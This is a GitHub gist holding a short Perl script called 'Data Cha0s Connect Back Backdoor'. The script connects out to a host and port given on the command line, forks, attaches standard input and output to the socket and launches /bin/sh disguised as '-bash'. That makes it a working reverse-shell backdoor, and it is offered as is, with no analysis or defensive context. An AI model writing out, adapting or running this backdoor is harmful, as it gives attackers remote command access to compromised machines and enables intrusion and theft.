Skip to content

Instantly share code, notes, and snippets.

@islanddog
Created February 24, 2017 15:53
Show Gist options
  • Save islanddog/f5ad7636acf61fd963531ead7c784dc9 to your computer and use it in GitHub Desktop.
Save islanddog/f5ad7636acf61fd963531ead7c784dc9 to your computer and use it in GitHub Desktop.
dc.pl - Backdoor Exploit
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment